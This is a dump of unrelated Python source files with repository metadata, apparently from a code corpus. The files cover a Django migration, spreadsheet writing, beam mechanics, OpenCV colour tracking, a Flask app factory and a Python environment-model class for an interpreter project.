('taggit', '0002_auto_20150616_2121'),
('blog', '0003_auto_20180315_1940'),
]
operations = [
migrations.AddField(
model_name='post',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags'),
),
]
| [
"zmm064@foxmail.com"
] | zmm064@foxmail.com |
c4cb2bb9a3fd2e5a3cfd94ecee5a4e52926d2aa9 | 5641c3ec4c812aac6e1581e8f72ac0a644566e1c | /Data/writeExcel.py | 6b854290c86b4225850ddf9ffcd9a89721e4ba4e | [] | no_license | ralowden/B490-Project | b001376f6c63730e8c53b6c8a429fab61c67d44f | abb9701f7dfe9776b924263eba29d90db9ec0ded | refs/heads/master | 2021-01-01T18:02:27.590903 | 2014-11-10T06:19:27 | 2014-11-10T06:19:27 | 26,420,886 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,232 | py | from __future__ import print_function
from openpyxl import load_workbook
import xlsxwriter
import sys
import string
#Create file from user input
if len(sys.argv) < 2:
sys.exit("Error: need filename as input")
fileName = sys.argv[1]
file = open(fileName)
fileNameWithoutExt = fileName.split(".")
newFile = fileNameWithoutExt[0] + ".xlsx"
readfilename = "3980edges_V.xlsx"
coordFile = open("coordFile.txt", 'a')
k = int(sys.argv[2])
edges = {}
values = []
for line in file:
entries = string.split(line)
key = int(entries[0])
value = int(entries[1])
if key in edges:
edges[key].append(value)
else:
edges[key] = [value]
if not value in values:
values.append(value)
keys = sorted(edges.keys())
values = sorted(values)
for value in values:
if not value in keys:
keys.append(value)
keys = sorted(keys)
#Create a workbook and add a worksheet
workbook = xlsxwriter.Workbook(newFile);
worksheet = workbook.add_worksheet()
#Fill headings of adjacency matrix
LUT = {}
for i in range(1, len(keys) + 1):
worksheet.write(i, 0, keys[i-1])
worksheet.write(0, i, keys[i-1])
value = keys[i-1]
LUT[i] = value
#print(LUT)
#print(edges)
#Fill adjacency matrix
for col in range(1, len(keys) + 1):
key = LUT[col]
for row in range(1, len(keys) + 1):
value = LUT[row]
if key in edges:
if value in edges[key]:
worksheet.write(row, col, 1)
else:
worksheet.write(row, col, 0)
else:
worksheet.write(row, col, 0)
workbook.close()
print("Successfully written to disk")
#Read data from values
"""wb = load_workbook(filename = readfilename)
ws_unnorm = wb.get_sheet_by_name(name = "Unnormalized")
ws_sym = wb.get_sheet_by_name(name = "Symmetric")
ws_rw = wb.get_sheet_by_name(name = "Random-walk")
row_num = 1;
for row in ws_unnorm.rows:
col_num = 1
coord_str = str(row_num) + " "
for cell in row:
if not col_num == 1:
coord_str += str(cell.internal_value) + " "
if col_num > k:
coordFile.write(coord_str + "\n")
break
col_num += 1
row_num += 1
coordFile.close() """
| [
"ralowden@indiana.edu"
] | ralowden@indiana.edu |
852776831fbe3219e5e605068c4a63a6d938466a | 2264cb3fbb52512f33a95bc93a4379b0329a05fb | /Recommendation/Jenny/rec_py/recSys.py | 5a88d34254153bd6d14940e3c081b201328d6eaf | [] | no_license | mengqwang2/AlibabaChallenge | 6b9a1cb90ba976005e1a3d489461993dadf3ef96 | a42cca07af4ce60615b43651d13d9ab5604cc860 | refs/heads/master | 2021-01-19T11:34:25.061280 | 2015-06-08T16:59:00 | 2015-06-08T16:59:00 | 37,080,200 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | import sys
import os
import data_process
if __name__=="__main__":
filepath="/Users/mengqwang/Documents/tMall/clean_t_alibaba_data.csv"
ratio0=int(sys.argv[1])
ratio1=int(sys.argv[2])
ratio2=int(sys.argv[3])
ratio3=int(sys.argv[4])
ratio4=int(sys.argv[5])
dp=data_process.data_process(filepath,ratio0,ratio1,ratio2,ratio3,ratio4)
dp.action2rate()
dp.dataOutput()
| [
"mengqwang2@gmail.com"
] | mengqwang2@gmail.com |
e9088dc481b384e7b3573deadfeb6d01d3be9eb8 | b5faf7fab5877bb89dd57e3511311587e17d5c30 | /youey/card.py | ecdf59bce9fc5beb61c5de10166954183bf24207 | [
"Unlicense"
] | permissive | wijijo/youey | f52eef9dee427f3b1a577836f328b03450e21531 | 4986f3cdf88a27c204d2d1023fd8ab3954d6060a | refs/heads/master | 2021-10-14T08:29:20.333345 | 2019-02-03T08:39:25 | 2019-02-03T08:39:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | #coding: utf-8
from youey.view import *
from youey.label import *
class CardView(View):
def setup(self):
super().setup()
self.size = GridSize(self.parent)
def render(self):
return f'<div id=\'{self.id}\' style=\'position: relative; box-sizing: border-box; overflow: hidden; text-overflow: ellipsis; pointer-events: none;\'></div>'
class StyledCardView(CardView):
def apply_theme(self):
super().apply_theme()
t = self.theme
self.border = t.on_background
#self.border_top = t.primary_variant, 10
self.shadow = t.shadow
self.margin = t.margin
self.border_radius = t.border_radius
| [
"mikael.honkala@gmail.com"
] | mikael.honkala@gmail.com |
33922d76382941b02c8ceb0bcb46d6d3955660e8 | 48032a202c5dadecb218a13fe08d079e96bd1c9e | /quarry/utils/tasks.py | 942e7a475e06d34860414c4cffb141f12c653b5d | [
"MIT-feh"
] | permissive | aaps/quarry | e7de4c827e6a581d97bbb165ba6d154b961c4347 | 181bccf99bbcfc1d0c46ac3d9790ba461263ac4d | refs/heads/master | 2021-01-17T05:21:04.087296 | 2015-10-09T10:32:44 | 2015-10-09T10:32:44 | 43,808,598 | 1 | 0 | null | 2015-10-07T10:23:46 | 2015-10-07T10:23:46 | null | UTF-8 | Python | false | false | 837 | py | from twisted.internet import reactor
from twisted.internet.task import LoopingCall
class Tasks(object):
def __init__(self):
self._tasks = []
def add_loop(self, time, callback, *args):
task = LoopingCall(callback, *args)
task.start(time, now=False)
self._tasks.append(task)
return task
def add_delay(self, time, callback, *args):
task = reactor.callLater(time, callback, *args)
def stop():
if task.active():
task.cancel()
def restart():
if task.active():
task.reset(time)
task.restart = restart
task.stop = stop
self._tasks.append(task)
return task
def stop_all(self):
while len(self._tasks) > 0:
task = self._tasks.pop(0)
task.stop() | [
"barney.gale@gmail.com"
] | barney.gale@gmail.com |
77a7b1b539d3ed002cf33ecbfca26cbb2d0b6a61 | e72671d153166d8e9aecbbc746d73bf98874fade | /tools/WriteSetup_Testbed_Server.py | f531f03c748d19237966b31450cf5e43924fffbb | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | abhilashabhardwaj/pike | 53d5f1795960a2b71b6d0ed22f1183b4ae4c4715 | 7c11307a702ffacadb370427505fdd9c8ad52f0f | refs/heads/master | 2022-11-14T01:22:53.107392 | 2022-10-11T10:16:27 | 2022-10-11T10:16:27 | 20,185,390 | 0 | 0 | NOASSERTION | 2020-02-20T05:33:34 | 2014-05-26T12:28:05 | Python | UTF-8 | Python | false | false | 2,739 | py | import os;
import sys;
def CreateFile(size, name):
try:
fname = name;
print fname;
fh = open(fname, 'w')
filesize = long(size)
print "Creating a file of %d Bytes with name as %s in present directory\n"%(filesize, fname);
print "filesize is %d bytes\n"%filesize
if size<128:
for i in range(size):
fh.write("x")
else:
chunk=(filesize/128);
print "Creating a file of %d Bytes with name as %s in present directory\n"%(filesize, fname);
for i in range(chunk):
#while (os.path.getsize(fname) < filesize):
fh.write ("900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface")
finally:
fh.close()
#CreateFile(0,"EmptyFile") #for Empty file
#CreateFile(512,"512BytesFile") #for 500Bytes file
#CreateFile(51200,"50KBFile") #for 50KB file
#CreateFile(131072,"128KBFile") #for 128KB file
#CreateFile(1048576,"1MBFile") #for 1MB file
#CreateFile(10485760,"10MBFile") #for 10MB file
#CreateFile(1073741824,"1GBFile") #for 1GB file
CreateFile(512,"TC001_512BytesFile")
CreateFile(1048576,"TC002_1MBFile")
CreateFile(512,"TC003_512BytesFile")
CreateFile(1048576,"TC004_1MBFile")
CreateFile(1048576,"TC005_1MBFile")
CreateFile(512,"TC006_512BytesFile")
CreateFile(1048576,"TC007_1MBFile")
CreateFile(512,"TC008_512BytesFile")
CreateFile(51200,"TC009_50KBFile")
CreateFile(51200,"TC010_50KBFile")
CreateFile(131072,"TC011_128KBFile")
CreateFile(51200,"TC012_50KBFile")
CreateFile(51200,"TC013_50KBFile")
CreateFile(51200,"TC014_50KBFile")
CreateFile(51200,"TC015_50KBFile")
CreateFile(51200,"TC016_50KBFile")
CreateFile(51200,"TC017_50KBFile")
CreateFile(51200,"TC018_50KBFile")
CreateFile(51200,"TC019_50KBFile")
CreateFile(51200,"TC020_50KBFile")
CreateFile(51200,"TC021_50KBFile")
CreateFile(0,"TC022_EmptyFile")
CreateFile(51200,"TC023_50KBFile")
CreateFile(131072,"TC024_128KBFile")
CreateFile(512,"TC25_512BytesFile")
CreateFile(512,"TC26_512BytesFile")
CreateFile(512,"TC27_512BytesFile")
CreateFile(512,"TC28_512BytesFile")
CreateFile(51200,"TC029_50KBFile")
CreateFile(51200,"TC030_50KBFile")
CreateFile(51200,"TC031_50KBFile")
CreateFile(51200,"TC032_50KBFile")
CreateFile(512,"TC033_512BytesFile")
CreateFile(512,"TC034_512BytesFile")
CreateFile(512,"TC035_512BytesFile")
CreateFile(512,"TC036_512BytesFile")
CreateFile(512,"TC037_512BytesFile")
CreateFile(512,"TC037a_512BytesFile")
CreateFile(512,"TC037b_512BytesFile")
CreateFile(512,"TC037c_512BytesFile")
CreateFile(1048576,"TC039_1MBFile")
CreateFile(512,"TC040_512BytesFile")
CreateFile(512,"TC041_512BytesFile")
CreateFile(512,"TC042_512BytesFile")
CreateFile(512,"TC045_512BytesFile")
CreateFile(512,"TC047_512BytesFile")
| [
"isilon-cifs@calsoftinc.com"
] | isilon-cifs@calsoftinc.com |
d4e19a35e16287496ee9fe5568332821313357ed | d785e993ed65049c82607a1482b45bddb2a03dda | /fakeable/fake_DoubleMuon_E_cfg.py | 14da36115cb68c18932fd22ecd5a9e27a8752300 | [] | no_license | PKUHEPEWK/ssww | eec02ad7650014646e1bcb0e8787cf1514aaceca | a507a289935b51b8abf819b1b4b05476a05720dc | refs/heads/master | 2020-05-14T04:15:35.474981 | 2019-06-28T23:48:15 | 2019-06-28T23:48:15 | 181,696,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = Configuration()
config.section_("General")
config.General.requestName = 'fake_DoubleMuon_E'
config.General.transferLogs= True
config.section_("JobType")
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'PSet.py'
config.JobType.scriptExe = 'crab_script.sh'
config.JobType.inputFiles = ['crab_fake_data_script.py','ssww_keep_and_drop.txt','ssww_output_branch_selection.txt','haddnano.py'] #hadd nano will not be needed once nano tools are in cmssw
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/DoubleMuon/Run2016E-Nano14Dec2018-v1/NANOAOD'
#config.Data.inputDBS = 'phys03'
config.Data.inputDBS = 'global'
config.Data.splitting = 'LumiBased'
#config.Data.splitting = 'EventAwareLumiBased'
config.Data.unitsPerJob = 60
config.Data.lumiMask = 'https://cms-service-dqm.web.cern.ch/cms-service-dqm/CAF/certification/Collisions16/13TeV/ReReco/Final/Cert_271036-284044_13TeV_23Sep2016ReReco_Collisions16_JSON.txt'
config.Data.outLFNDirBase = '/store/user/%s/nano2016' % (getUsernameFromSiteDB())
config.Data.publication = False
config.Data.outputDatasetTag = 'fake_DoubleMuon_E'
config.section_("Site")
config.Site.storageSite = "T2_CH_CERNBOX"
#config.Site.storageSite = "T2_CH_CERN"
#config.section_("User")
#config.User.voGroup = 'dcms'
| [
"jiexiao@pku.edu.cn"
] | jiexiao@pku.edu.cn |
97f367d457b883c623e9ef127177e267ac029527 | c06e097c5f2a019ac1de5bc1d15c2eafb339658d | /backend/src/app.py | d5ce04f0c2973be78261ec8004c0c26ca51e95de | [] | no_license | edwinkys/stock-analytic | 0d39a9832e281612724d6aa1e283dcabae83766f | 96209147710c692328141e7083c23b56eb548727 | refs/heads/main | 2023-03-30T08:43:30.041235 | 2021-04-06T17:58:41 | 2021-04-06T17:58:41 | 333,241,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | '''
API Main Source Code
'''
from flask import Flask
from flask_cors import CORS
# Import blueprints
from src.blueprints.stock.endpoints import stock
def create_app(settings_override=None):
'''
Create Flask back end app.
@settings_override: Override app configuration.
return: Flask app.
'''
app = Flask(__name__, instance_relative_config=True)
app.config.from_object('config.settings')
app.config.from_pyfile('settings.py', silent=True)
if settings_override:
app.config.update(settings_override)
# Register blueprints
app.register_blueprint(stock)
# Register extension
extensions(app)
return app
def extensions(app):
'''
Add extensions to the app.
@app: Flask app.
return: None.
'''
# Initialize extensions
cors = CORS()
# Add extensions
cors.init_app(app)
return None
| [
"itsedwinkys@gmail.com"
] | itsedwinkys@gmail.com |
d53d3a96ba0dd0cbcf815b7d8a30d78950c17a66 | b85676666101e049440cc33c4ad2a3e58eab5580 | /common/conndb.py | 29ff6e2c346c2673457aa30c09e90ffb64c546ef | [] | no_license | zzxx59342506/python-excelimporter | f0a624ea0a0b7d7f19bddb425db40ad207f53ca6 | 4eac92b06f4b57f56020ccd3f965438538db93ef | refs/heads/master | 2023-04-23T01:08:18.370207 | 2021-05-09T10:36:43 | 2021-05-09T10:36:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,069 | py | # connect to mysql
import pymysql
import os
from common.handleconfig import HandleConfig
class ConnDB():
def __init__(self):
self.HandleConfig = HandleConfig()
self.server = self.HandleConfig.handle_config("g", "global", "use_server")
self.host = self.HandleConfig.handle_config('g', self.server, 'host')
self.user = self.HandleConfig.handle_config('g', self.server, 'user')
self.passwd = self.HandleConfig.handle_config('g', self.server, 'password')
self.port = int(self.HandleConfig.handle_config('g', self.server, 'port'))
def conndb(self, db=None, charset='utf8'):
self.db = db
conn = pymysql.connect(host=self.host, user=self.user, passwd=self.passwd, port=self.port, charset=charset, database=db)
return conn
# execute sql
def exec(self, conn, sql, kill=False, COMMAND=None):
#conn = self.conndb()
cur = conn.cursor()
database = self.db
if kill:
killsql = "SELECT CONCAT('kill ',id) FROM information_schema.`PROCESSLIST` WHERE DB = '{}'".format(database)
if COMMAND:
killsql = "SELECT CONCAT('kill ',id) FROM information_schema.`PROCESSLIST` WHERE DB = '{}' OR COMMAND = 'Sleep'".format(database)
cur.execute(killsql)
killids = cur.fetchall()
killids = list(killids)
idx = 0
for killid in killids:
killids[idx] = (list(killid))[0]
killidsql = killids[idx]
cur.execute(killidsql)
idx = idx + 1
for s in sql.split(";"):
if s != "":
cur.execute(s)
conn.commit()
cur.close()
return cur
# exec cmd
def cmd(self, db, op, file):
if op == "mysql":
cmd_statement = "{0} -u{1} -p{2} -h{3} -P{4} {5} --default-character-set=utf8 < \"{6}\"".format(op,self.user,self.passwd,self.host,self.port,db,file)
print(cmd_statement)
ret = os.system(cmd_statement)
return ret | [
"xiaobo.zhang@dev.neoncrm.com"
] | xiaobo.zhang@dev.neoncrm.com |
f9cb2443b7fe489c327c6d699ea1a85004394c9b | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/127/usersdata/251/36337/submittedfiles/ex11.py | 8b0f6fb148ea3944e979a9c5fa90a71cb8f5fb1b | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | # -*- coding: utf-8 -*-
dia1 = int(input('Digite o dia da primeira data: '))
mes1 = int(input('Digite o mês da primeira data: '))
ano1 = int(input('Digite o ano da primeira data: '))
dia2 = int(input('Digite o dia da segunda data: '))
mes2 = int(input('Digite o mês da segunda data: '))
ano2 = int(input('Digite o ano da segunda data: '))
if ano1>ano2:
print('DATA 1')
elif ano2>ano1:
print('DATA 2')
else:
if mes1>mes2:
print('DATA 1')
elif mes2>mes1:
print('DATA 2')
else:
if ano1>ano2:
print('DATA 1')
elif ano2>ano1:
print('DATA 2')
else:
print('IGUAIS') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
70954f8acfa28f88fc48ed29c864438711c7a04b | af030f2740f8e8b2de7e5013e9a4f8c3bee26ba2 | /models/omes/Detec-objet/08/program07.py | 6de833026582fdc0f8a6939cc9f3083e796f0c64 | [] | no_license | Jhongesell/detertor-de-poligonos-y-sus-parametros | a419145ad9ca4948c5187e2abf77f1fa54c12e45 | 0a288120f58ab1dd35025bbb7176fc159daf3bd7 | refs/heads/main | 2023-04-27T05:15:34.345057 | 2021-05-17T03:18:05 | 2021-05-17T03:18:05 | 344,097,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,837 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 22:38:29 2021
@author: jhongvp
"""
import cv2
import numpy as np
def dibujar(mask,color):
contornos,_ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for c in contornos:
area=cv2.contourArea(c)
if area > 3000:
M=cv2.moments(c)
if (M["m00"]==0): M["m00"]=1
x=int(M["m10"]/M["m00"])
y=int(M['m01']/M["m00"])
nuevoContorno=cv2.convexHull(c)
cv2.circle(frame,(x,y),7,(50,100,4),-1)
cv2.putText(frame,'{},{}'.format(x,y),(x+10,y), font, 0.75,(0,0,255),1,cv2.LINE_AA)
cv2.drawContours(frame,[nuevoContorno], 0, (0,255,0), 3)
cap=cv2.VideoCapture(1)
azulBajo = np.array([105,100,20],np.uint8)
azulAlto = np.array([125,255,255],np.uint8)
amarilloBajo = np.array([25,100,20],np.uint8)
amarilloAlto = np.array([35, 255, 255],np.uint8)
#redBajo1 = np.array([0,100,20],np.uint8)
#redAlto1 = np.array([5,255,255],np.uint8)
#redBajo2 = np.array([175, 100, 20],np.uint8)
#redAlto2 = np.array([179,255,255],np.uint8)
font = cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, frame=cap.read()
if ret==True:
frameHSV = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
maskAzul = cv2.inRange(frameHSV,azulBajo,azulAlto)
maskAmarillo = cv2.inRange(frameHSV,amarilloBajo,amarilloAlto)
#maskRed1 = cv2.inRange(frameHSV,redBajo1,redAlto1)
#maskRed2 = cv2.inRange(frameHSV,redBajo2,redAlto2)
#maskRed = cv2.add(maskRed1, maskRed2)
dibujar(maskAzul,(255,0,0))
dibujar(maskAmarillo,(0,255,255))
#dibujar(maskRed,(0,0,255))
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('s'):
break
cap.release()
cv2.destroyAllWindows()
| [
"unmsm182@gmail.com"
] | unmsm182@gmail.com |
9ad166212a3248adff0e4a11a45c752872e01190 | 5eac0e97297f557fc49b7352ec11953a69f92c57 | /PyNite/BeamSegment.py | 7a3841c82d693d8e10f569a86ba9b3368e084793 | [
"MIT"
] | permissive | FJFranklin/PyNite | bb27606602724701484bacbbdd75688aa57159d4 | de06b8a5020f845e77f5ffa8e3033ab0891d45cc | refs/heads/master | 2021-07-12T04:37:02.651970 | 2020-10-11T17:45:24 | 2020-10-11T17:45:24 | 198,198,708 | 0 | 0 | MIT | 2019-07-22T10:14:06 | 2019-07-22T10:14:05 | null | UTF-8 | Python | false | false | 9,833 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 6 20:52:31 2017
@author: D. Craig Brinck, SE
"""
# %%
# A mathematically continuous beam segment
class BeamSegment():
"""
A mathematically continuous beam segment
Properties
----------
x1 : number
The starting location of the segment relative to the start of the beam
x2 : number
The ending location of the segment relative to the start of the beam
w1 : number
The distributed load magnitude at the start of the segment
w2 : number
The distributed load magnitude at the end of the segment
p1 : number
The distributed axial load magnitude at the start of the segment
p2 : number
The distributed axial load magnitude at the end of the segment
V1 : number
The internal shear force at the start of the segment
M1 : number
The internal moment at the start of the segment
P1 : number
The internal axial force at the start of the segment
theta1: number
The slope (radians) at the start of the segment
delta1: number
The displacement at the start of the segment
EI : number
The flexural stiffness of the segment
Methods
-------
__init__()
Constructor
Length()
Returns the length of the segment
Shear(x)
Returns the shear force at a location on the segment
Notes
-----
Any unit system may be used as long as the units are consistent with each other
"""
#%%
def __init__(self):
"""
Constructor
"""
self.x1 = None # Start location of beam segment (relative to start of beam)
self.x2 = None # End location of beam segment (relative to start of beam)
self.w1 = None # Linear distributed transverse load at start of segment
self.w2 = None # Linear distributed transverse load at end of segment
self.p1 = None # Linear distributed axial load at start of segment
self.p2 = None # Linear distributed axial load at end of segment
self.V1 = None # Internal shear force at start of segment
self.M1 = None # Internal moment at start of segment
self.P1 = None # Internal axial force at start of segment
self.theta1 = None # Slope at start of beam segment
self.delta1 = None # Displacement at start of beam segment
self.EI = None # Flexural stiffness of the beam segment
#%%
# Returns the length of the segment
def Length(self):
"""
Returns the length of the segment
"""
return self.x2 - self.x1
#%%
# Returns the shear force at a location 'x' on the segment
def Shear(self, x):
V1 = self.V1
w1 = self.w1
w2 = self.w2
L = self.Length()
return V1-(w2-w1)/(2*L)*x**2-w1*x
#%%
# Returns the moment at a location on the segment
def Moment(self, x):
V1 = self.V1
M1 = self.M1
w1 = self.w1
w2 = self.w2
L = self.Length()
return M1+V1*x-(w2-w1)/(6*L)*x**3-w1*x**2/2
#%%
# Returns the axial force at a location on the segment
def Axial(self, x):
P1 = self.P1
p1 = self.p1
p2 = self.p2
L = self.Length()
return P1+(p2-p1)/(2*L)*x**2+p1*x
#%%
def Slope(self, x):
"""
Returns the slope at a point on the segment
Parameters
----------
x : number
Location (relative to start of segment) where slope is to be calculated
EI : number
Flexural stiffness of the segment
Returns
-------
Slope : number
The slope of the segment (radians) at location "x"
Notes
-----
Any unit system may be used as long as the units are consistent with each other
"""
V1 = self.V1
M1 = self.M1
w1 = self.w1
w2 = self.w2
theta1 = self.theta1
L = self.Length()
EI = self.EI
return theta1 + 1/EI*(M1*x + V1/2*x**2 - (w2-w1)/(24*L)*x**4 - w1/6*x**3)
#%%
# Returns the deflection at a location on the segment
def Deflection(self, x):
V1 = self.V1
M1 = self.M1
w1 = self.w1
w2 = self.w2
theta1 = self.theta1
delta1 = self.delta1
L = self.Length()
EI = self.EI
return delta1 + theta1*x + 1/EI*(M1/2*x**2 + V1/6*x**3 - (w2 - w1)/(120*L)*x**5 - w1/24*x**4)
#%%
# Returns the maximum shear in the segment
def MaxShear(self):
w1 = self.w1
w2 = self.w2
L = self.Length()
# Determine possible locations of maximum shear
if w1-w2 == 0:
x1 = 0
else:
x1 = w1*L/(w1-w2)
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the shear at each location of interest
V1 = self.Shear(x1)
V2 = self.Shear(x2)
V3 = self.Shear(x3)
# Return the maximum shear
return max(V1, V2, V3)
#%%
# Returns the minimum shear in the segment
def MinShear(self):
w1 = self.w1
w2 = self.w2
L = self.Length()
# Determine possible locations of minimum shear
if w1-w2 == 0:
x1 = 0
else:
x1 = w1*L/(w1-w2)
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the shear at each location of interest
V1 = self.Shear(x1)
V2 = self.Shear(x2)
V3 = self.Shear(x3)
# Return the minimum shear
return min(V1, V2, V3)
#%%
# Returns the maximum moment in the segment
def MaxMoment(self):
w1 = self.w1
w2 = self.w2
V1 = self.V1
L = self.Length()
# Find the quadratic equation parameters
a = (w1-w2)/(2*L)
b = -w1
c = V1
# Determine possible locations of maximum moment
if a == 0:
if b != 0:
x1 = -c/b
else:
x1 = 0
x2 = 0
elif b**2-4*a*c < 0:
x1 = 0
x2 = 0
else:
x1 = (-b+(b**2-4*a*c)**0.5)/(2*a)
x2 = (-b-(b**2-4*a*c)**0.5)/(2*a)
x3 = 0
x4 = L
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
if round(x2, 10) < 0 or round(x2, 10) > round(L, 10):
x2 = 0
# Find the moment at each location of interest
M1 = self.Moment(x1)
M2 = self.Moment(x2)
M3 = self.Moment(x3)
M4 = self.Moment(x4)
# Return the maximum moment
return max(M1, M2, M3, M4)
#%%
# Returns the minimum moment in the segment
def MinMoment(self):
w1 = self.w1
w2 = self.w2
V1 = self.V1
L = self.Length()
# Find the quadratic equation parameters
a = (w1-w2)/(2*L)
b = -w1
c = V1
# Determine possible locations of minimum moment
if a == 0:
if b != 0:
x1 = -c/b
else:
x1 = 0
x2 = 0
elif b**2-4*a*c < 0:
x1 = 0
x2 = 0
else:
x1 = (-b+(b**2-4*a*c)**0.5)/(2*a)
x2 = (-b-(b**2-4*a*c)**0.5)/(2*a)
x3 = 0
x4 = L
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
if round(x2, 10) < 0 or round(x2, 10) > round(L, 10):
x2 = 0
# Find the moment at each location of interest
M1 = self.Moment(x1)
M2 = self.Moment(x2)
M3 = self.Moment(x3)
M4 = self.Moment(x4)
# Return the minimum moment
return min(M1, M2, M3, M4)
#%%
# Returns the maximum axial force in the segment
def MaxAxial(self):
p1 = self.p1
p2 = self.p2
L = self.Length()
# Determine possible locations of maximum axial force
if p1-p2 != 0:
x1 = L*p1/(p1-p2)
else:
x1 = 0
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the axial force at each location of interest
P1 = self.Axial(x1)
P2 = self.Axial(x2)
P3 = self.Axial(x3)
# Return the maximum axial force
return max(P1, P2, P3)
#%%
# Returns the minimum axial force in the segment
def MinAxial(self):
p1 = self.p1
p2 = self. p2
L = self.Length()
# Determine possible locations of minimum axial force
if p1-p2 != 0:
x1 = L*p1/(p1-p2)
else:
x1 = 0
if round(x1, 10) < 0 or round(x1, 10) > round(L, 10):
x1 = 0
x2 = 0
x3 = L
# Find the axial force at each location of interest
P1 = self.Axial(x1)
P2 = self.Axial(x2)
P3 = self.Axial(x3)
# Return the minimum axial force
return min(P1, P2, P3)
| [
"noreply@github.com"
] | FJFranklin.noreply@github.com |
72471ec575910223fb97b0d4630be0fcf1b4fcb7 | aa6ca3602ce2cb2c958bb252aa6e14ea554af453 | /kotti_dkbase/views.py | 0bbc362da5aeefa4cb6209c9b33f7068b305e69a | [
"BSD-2-Clause",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | chrneumann/kotti_dkbase | 20283e03229327a0b58f5971a28dd9b73c920bf7 | 3e3749c9887538bb07b8cd8f842b77b219596191 | refs/heads/master | 2016-08-04T18:55:50.492661 | 2012-08-24T14:20:26 | 2012-08-24T14:20:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | from pyramid.httpexceptions import HTTPInternalServerError
from pyramid_mailer.message import Message
from kotti.message import get_mailer
from kotti import get_settings
def mail_admin(msg):
"""
Send given message to the admins.
"""
admin = get_settings().get('kotti_dkbase.admin_email')
message = Message(
recipients=[admin],
subject=u'Server-Error',
body=msg,
)
mailer = get_mailer()
mailer.send_immediately(message)
def exception_decorator(view):
"""
Transform generic exceptions to Error 500
"""
def f(exception, request):
return view(HTTPInternalServerError(str(exception)), request)
return f
def error_view(exception, request):
should_mail = get_settings().get('kotti_dkbase.send_error_mails') == "True"
if should_mail and exception.code != 404:
mail_admin(str(exception) + str(request))
request.response.status_int = exception.code
return {}
| [
"cneumann@datenkarussell.de"
] | cneumann@datenkarussell.de |
4c8926852a17017751bd19f68293508ddb98339c | 3470201aec8d85271c5b10d01385efbe12c13014 | /env.py | c50ac229f24a79fb699fe0bfc486c6c29ecbc652 | [] | no_license | jsundahl/220-project-5 | 5e1465d49f4fe6aebd7e6c2895d469035aad6b58 | b9f935cc77d4ba297dc9535ac6bdbe163bcb7237 | refs/heads/master | 2021-01-18T23:34:24.334310 | 2017-04-07T20:07:02 | 2017-04-07T20:07:02 | 87,118,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,222 | py | class GlobalEnv:
""" Implements a "ribcage" data structure that stores bindings of variables and values as lists.
Attributes:
variables (List): the identifiers
values (List): the associated values bound to the variables
prev (GlobalEnv): a reference to a previous GlobalEnv.
Methods to implement:
__init__ Initializes a new instance of a GlobalEnv.
Args:
prev (GlobalEnv): initialize the variables and values lists, the previous environment is
initialized to the argument.
empty_env A static method that returns the empty GlobalEnv.
Args:
none
Returns:
GlobalEnv: A new instance of a GlobalEnv with None as the previous environment.
lookup Looks up the variable passed to it and returns the associated value.
Args:
symbol (string): A string that is a variable (identifier) that is bound to some value in an environment.
Returns:
value: The value that is bound to the symbol passed in. This can be any object that is stored in the
values list associated with the symbol in a "rib" of the ribcage.
extend Creates a new "rib" in an environment.
Args:
variables (List): a list of variable identifiers.
values (List): a list of values that correspond to the identifiers in the variables list.
Returns:
GlobalEnv: A new instance of a GlobalEnv with "self" as the previous environment.
"""
def __init__(self, prev=None, vars=None, vals=None):
if vals is None:
vals = []
if vars is None:
vars = []
self.variables = vars
self.values = vals
self.prev = prev
@staticmethod
def empty_env():
return GlobalEnv()
def lookup(self, symbol):
return lookup(self, symbol)
def extend(self, vars, vals):
return GlobalEnv(self, vars, vals)
class LocalEnv:
""" Implements a "local" version of an environment. This class differs from GlobalEnv only in that it
maintains a reference to a GlobalEnv as well as to a previous LocalEnv. All local environments
have a reference to the global environment. It also does not need an empty_env method as all data
required to create an instance will be known at that time.
Attributes:
variables (List): the identifiers
values (List): the associated values bound to the variables
prev (LocalEnv): a reference to a previous LocalEnv.
